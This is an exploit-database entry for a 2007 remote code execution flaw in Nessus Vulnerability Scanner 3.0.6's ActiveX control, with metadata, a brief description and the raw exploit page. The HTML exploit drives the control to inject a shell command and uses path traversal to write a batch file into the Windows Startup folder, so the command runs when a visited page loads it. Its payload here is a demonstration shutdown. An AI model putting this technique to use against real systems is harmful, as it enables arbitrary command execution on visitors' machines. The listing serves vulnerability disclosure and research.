header-logo
Suggest Exploit
vendor:
Nessus Vulnerability Scanner
by:
Krystian Kloskowski (h07)
7.5
CVSS
HIGH
Remote Code Execution
CWE
Product Name: Nessus Vulnerability Scanner
Affected Version From: 3.0.6
Affected Version To: 3.0.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2
2007

Nessus Vulnerability Scanner 3.0.6 ActiveX 0day Remote Code Execution Exploit

This exploit allows remote code execution on systems running Nessus Vulnerability Scanner 3.0.6. The bug was discovered by Krystian Kloskowski (h07) and was tested on Nessus 3.0.6 with IE 6 on Windows XP SP2 (Polish). The exploit injects a command to shut down the system with a delay of 1000 milliseconds and displays the message 'hello world ;]'. It then saves a file named 'exec.bat' in a specific directory.

Mitigation:

Update to a patched version of Nessus Vulnerability Scanner.
Source

Exploit-DB raw data:

<HTML>
<!--
Nessus Vulnerability Scanner 3.0.6 ActiveX 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
Just for fun ;]
-->

<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>

<script language="javascript">
obj.addsetConfig('shutdown -t 1000 -s -c "hello world ;]" && pause', '', '');
obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat");
</script>
</HTML>

# milw0rm.com [2007-07-27]

Navigation

Suggest Exploit

Services By CQR